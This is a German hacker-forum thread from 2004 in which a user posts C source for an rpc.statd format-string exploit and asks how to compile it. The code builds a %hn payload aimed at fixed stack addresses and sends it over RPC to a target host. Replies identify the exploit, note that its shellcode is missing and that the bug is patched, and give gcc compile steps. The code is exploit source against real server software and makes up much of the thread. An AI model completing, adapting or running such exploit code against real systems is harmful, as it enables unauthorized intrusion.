Hackerboard Wiki HaboBlog
Hackerboard bei Facebook Hackerboard bei Google+ Hackerboard bei Twitter

[HaBo]

 
Virenschutz · Tools & Aggressive Software Tips zum Kampf gegen gegen Viren, Trojaner, CryptoSoft und Programme, die erstellt wurden um Schaden anzurichten, werden hier behandelt. Aber auch Tools aus dem Security Bereich sind hier richtig.

exploit

Diskussion: exploit im Forum Virenschutz · Tools & Aggressive Software, in der Kategorie Security Area; Anzeige Wie bekomme ich son exploit überhaupt zum laufen kennt da jemand so ein paar tuts wie man son teil ...

Antwort
Alt 12.12.04, 05:39   #1 (permalink)
OmeGA
Guest
 
Likes:
Standard exploit

Anzeige

Wie bekomme ich son exploit überhaupt zum laufen kennt da jemand so ein paar tuts wie man son teil kompelieren kann ???

hier ist der source den ich kompelieren will:

#include <sys/types.h>
#include <sys/time.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <rpcsvc/sm_inter.h>
#include <sys/socket.h>

void usage(char *s) {
printf("Usage: %s host [-nopoke]\n", s);
exit(0);
}

extern char shell[];

main(int argc, char *argv[]) {
CLIENT *cl;
enum clnt_stat stat;
struct timeval tm;
struct mon monreq;
struct sm_stat_res monres;
struct hostent *hp;
struct sockaddr_in target;
int sd, i, noplen=strlen(nop), nopoke=0;
char *ptr=code, *p2, code[4096];

if (argc < 2)
usage(argv[0]);
if (argc > 2)
nopoke = 1;

/* Alignment */
strcpy(ptr, "AAA");
ptr += strlen(ptr);

/* Target to write to! */
*(unsigned long *)(ptr) = 0x7fffeb04;
ptr += sizeof(unsigned long);

/* pad */
*(unsigned long *)(ptr) = 0x11111111;
ptr += sizeof(unsigned long);

/* Target Two (two higher in memory probably) */
*(unsigned long *)(ptr) = 0x7fffeb06;
ptr += sizeof(unsigned long);

for(i = 0; i < 46-1; i++) {
strcpy(ptr, "%12d");
ptr += strlen(ptr);
}

if(!nopoke) {
/* Value to write - amount written */
/* Guess a bit - remember to leave a lot of padding, and be lucky on alignment */
/* Don't correct for IP address! Forced to localhost by stat code - same length. */
#define HIGH 0x7fff
#define LOW 0xeecc
sprintf(ptr, "%%%dd%%hn", HIGH - 12*45
- strlen("STAT_FAIL to 127.0.0.1 for SM_MON of AAABBBB1111CCCC"));
ptr += strlen(ptr);

sprintf(ptr, "%%%dd%%hn", (LOW - HIGH) % 65536);
ptr += strlen(ptr);

/* CODE */
p2 = shell;
while(*p2)
*(ptr++) = *(p2++);
}
*(ptr++) = 0;

memset(&monreq, 0, sizeof(monreq));
monreq.mon_id.my_id.my_name="localhost";
monreq.mon_id.my_id.my_prog=0;
monreq.mon_id.my_id.my_vers=0;
monreq.mon_id.my_id.my_proc=0;
monreq.mon_id.mon_name= code /*code*/;

if ((hp=gethostbyname(argv[1])) == NULL) {
printf("Can't resolve %s\n", argv[1]);
exit(0);
}
target.sin_family=AF_INET;
target.sin_addr.s_addr=*(u_long *)hp->h_addr;
target.sin_port=0; /* ask portmap */
sd=RPC_ANYSOCK;

tm.tv_sec=10;
tm.tv_usec=0;
if ((cl=clntudp_create(&target, SM_PROG, SM_VERS, tm, &sd)) == NULL) {
clnt_pcreateerror("clnt_create");
exit(0);
}
stat=clnt_call(cl, SM_MON, xdr_mon, (char *)&monreq, xdr_sm_stat_res,
(char *)&monres, tm);
if (stat != RPC_SUCCESS)
clnt_perror(cl, "clnt_call");
else
printf("stat_res = %d.\n", monres.res_stat);
clnt_destroy(cl);
}

  Mit Zitat antworten
Alt 12.12.04, 10:29   #2 (permalink)
 
Registriert seit: 14.01.04
NeoN Leistung: Facit NTK
Likes: 0
Standard

hmm, wozu willst du das denn machen? Wenn dus schon nicht hinbekommst zu kompilieren, dann solltest du soetwas auch nicht benutzen.

Solcher Code ist immer kompilier bereit, nur du musst die Voraussetzungen heranschaffen, die es benötigt. <- hint
NeoN ist offline   Mit Zitat antworten
   
HaBOT
 
- Anzeige -

Werbung ist gerade online    
Alt 12.12.04, 10:51   #3 (permalink)
Rushjo
Guest
 
Likes:
Standard

Also das ist erstmal ein "rpc.statd - format sting Exploit", den man laut den includierten Header-Dateien unter Linux kompilen sollte. Aber ich bezweifele mal, das Du Exploit so einfach zum Laufen bekommst, da hier so ein paar komische Sachen drin sind, wie:

Code:
 /* CODE */
p2 = shell;
<-- verweist auf die Constante namens "shell", die ist aber nirgendwo definiert
while(*p2) *(ptr++) = *(p2++); } *(ptr++) = 0;
Da fehlen auch noch ein paar Dinge. Desweiteren macht es sich immer ganz gut, sich mal die Original-Quelle (hier) heraus zu suchen. Denn hier steht dann folgenden Kommentar vom Author:

Zitat:
Attached is an exploit. The offsets are for Linux/PowerPC, Debian 2.2. It
isn't functional, though - and it's more than just kiddy-proofed. You'll
need three things:
(A) shellcode. There's two or three published; mine isn't quite ready
for public consumption (meaning it's so ugly it embarrasses me).
I think it's better than any of the other PPC shellcodes currently
available, though. I'll publish it eventually.
(B) sm_inter.x from the nfs-utils source
(C) A way to flush the cache before running code.
PowerPC (recent CPUs, at least) has a separate data and instruction
cache. If you use this exploit as is, with gdb attached to the
process, single stepping, it will work. If you run it on a remote
machine, it won't. Why not? Because the code is on the stack, which
remains in the data cache, and then the icache loads the old contents
of the stack when you branch there!
There are several solutions to this.

You may also need to change the offsets. I think the exploit says all it
needs to say without hand-holding - questions about using it WILL go
directly to /dev/null. I do have a fully function version of this, and I
have verified that it works as promised.
Was ja nun Alles zum betroffenen System (=Debian 2.2) sagt. Ausserdem erklärt er auch gleich noch:

Zitat:
he current version of statd does not have these problems, for at least the
past two weeks (I believe the current version is 0.1.9.1). Fixed Debian
packages are available for alpha, sparc, powerpc, and i386.
Ausserdem würde ich Dir erstmal die Lektüre eines schönen C-Buches empfehlen, bevor Du versuchst, irgendwelche Sachen zu kompilen, die Du nicht wirklich verstehst. So soll ja schon vorgekommen sein, das dort richtig "böse" Hintertüren drin sind.

MfG Rushjo
  Mit Zitat antworten
Alt 12.12.04, 22:48   #4 (permalink)
OmeGA
Guest
 
Likes:
Standard

Nö is doch nicht ilegal wenn das mein eigener server ist

und welches buch kannst du mir den da emfehlen

kennst du noch ein paar seiten wo man das auch erklert bekommt

danke für deine mühe
  Mit Zitat antworten
Alt 16.12.04, 15:36   #5 (permalink)
 
Benutzerbild von semtex
 
Registriert seit: 30.09.03
semtex Leistung: Facit NTK
Likes: 0
Standard

gcc -o exploitname exploitsouce.c

Das führt den GNU-C-Compiler aus und lässt ihn die C-Sourcedatei exploitsource.c in die Executable exploitname kompilliern.
Da in dem Source meist (absichtlich) Fehler enthalten sind bekommst du nicht gleich eine Executable sondern erstmal die Error-Meldungen und Warnings des Compilers.

vi exploitsource.c

Öffnet den Exploitsourcecode mit VI VIM oder ELVIS *ist ein editor*hachja Technik ist was tolles.

Nach dem Editieren versuchst du wieder den Source zu kompillieren.

gcc -o exploitname exploitsource.c

Das machst du solange bis du alle fehler gefunden hast... naja
dann musst du nur noch rausbekommen wie das alles genau funzt und wie man es bentutz *steht ja meist mit dabei* und dann kannst du es an DEINEM server in DEINEM Netz testen... enjoy.

PS:C/C++ Kenntnisse sind mehr als empfehlenswert! Erstmal hilft es dir wesentlich dabei weiter die Fehler zu finden (ich kenne kaum sploits die ohne Fehler sind... das hält die ScriptKiddies fern) und zweitens ist es um einiges befriedigender wenigstens so ungefähr zu wissen was da eigentlich vor sich geht. ;-D

PPS:Das Sploit musst du unter Linux,Unix oder Cygwin compilen ... nicht dass du dich wunderst warum dein VC dauernd fehlende Header meldet. ==)
semtex ist offline   Mit Zitat antworten
Alt 21.12.04, 16:01   #6 (permalink)
OmeGA
Guest
 
Likes:
Standard

Jo danke für deine hilfe

doch macht man dies mit den befehlen nicht unter linux so den ich habe windoof
  Mit Zitat antworten
Alt 21.12.04, 16:58   #7 (permalink)
 
Registriert seit: 28.02.04
Eckbert Leistung: Facit NTK
Likes: 0
Standard

ich muss meist noch chmod u+x machen bevor ich das teil ausführen kann.
Eckbert ist offline   Mit Zitat antworten
Alt 21.12.04, 17:02   #8 (permalink)
 
Registriert seit: 28.05.04
chrisi Leistung: Facit NTK
Likes: 0
Standard

@ Eckbert:
OmegA schreibt, er hat Windows.... was soll er da mit chmod?!
chrisi ist offline   Mit Zitat antworten
Alt 22.12.04, 02:25   #9 (permalink)
Member of Honour
 
Registriert seit: 11.09.03
Watchme Leistung: Z3
Likes: 2
Standard

Zitat:
Original von chrisi
@ Eckbert:
OmegA schreibt, er hat Windows.... was soll er da mit chmod?!
begreifen das er davon besser die FInger laesst
Watchme ist offline   Mit Zitat antworten
Alt 22.12.04, 03:20   #10 (permalink)
Träger des silbernen Seepferdchens
 
Benutzerbild von sieben
 
Registriert seit: 24.04.02
sieben Leistung: Z3
Likes: 9
Standard

Zitat:
Original von Watchme
Zitat:
Original von chrisi
@ Eckbert:
OmegA schreibt, er hat Windows.... was soll er da mit chmod?!
begreifen das er davon besser die FInger laesst
Von chmod?
__________________
Diese Zeile ist reserviert für Clark Kent.
sieben ist offline   Mit Zitat antworten
Alt 22.12.04, 11:57   #11 (permalink)
 
Registriert seit: 21.09.04
magenbrot Leistung: Facit NTK
magenbrot eine Nachricht über ICQ schicken
Likes: 0
Standard

die 10 euro sind dir doch schon sicher glaub da wettet keiner hier dagegen
magenbrot ist offline   Mit Zitat antworten
Alt 22.12.04, 17:22   #12 (permalink)
 
Registriert seit: 28.02.04
Eckbert Leistung: Facit NTK
Likes: 0
Standard

Mein Post war als Ergänzung zu eftex Post gedacht.
Eckbert ist offline   Mit Zitat antworten
Alt 26.12.04, 02:49   #13 (permalink)
OmeGA
Guest
 
Likes:
Standard

mmm

Also soll ich jetzt von allem die finger lassen wenn ichs nicht auf anhib kapiere???

naja werde mich trotzdem weiterhin damit beschäftigen

und ich habe mir gerade Linux Red Hat besorgt
  Mit Zitat antworten
Alt 26.12.04, 10:15   #14 (permalink)
Rushjo
Guest
 
Likes:
Standard

@OmegA

Nein, wir haben nicht gesagt, dass Du Dich nicht mitbeschäftigen sollst, sondern das Du Dich erstmal belesen solltest über die Grundlagen, bevor Du wie ein "Script Kiddie" irgendwelche Exploits compilen willst. Empfehlenswert wären Grundlagen in C/C++. Linux System Architektur und eine generelles Verständnis zu BufferOverflows etc.

MfG Rushjo
  Mit Zitat antworten
Alt 27.12.04, 00:47   #15 (permalink)
OmeGA
Guest
 
Likes:
Standard

Da gebe ich dir recht ich möchte aufjedenfall nicht als Script Kiddy gelten

nun werd ich mich mit C++ beschäftigen
  Mit Zitat antworten
Antwort
   
- Anzeige -

Werbung ist gerade online    

[HaBo] » Security Area » Virenschutz · Tools & Aggressive Software » exploit
Themen-Optionen
Ansicht

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks sind aus
Pingbacks sind aus
Refbacks sind aus


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
Exploit? ozeo (In)security allgemein 5 30.04.08 13:37
Exploit Aim devnull (In)security allgemein 5 27.10.05 18:20
Exploit dbz42 Code Kitchen 0 07.06.04 18:13
WKS Exploit gangstasta Code Kitchen 3 09.03.04 19:08


1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61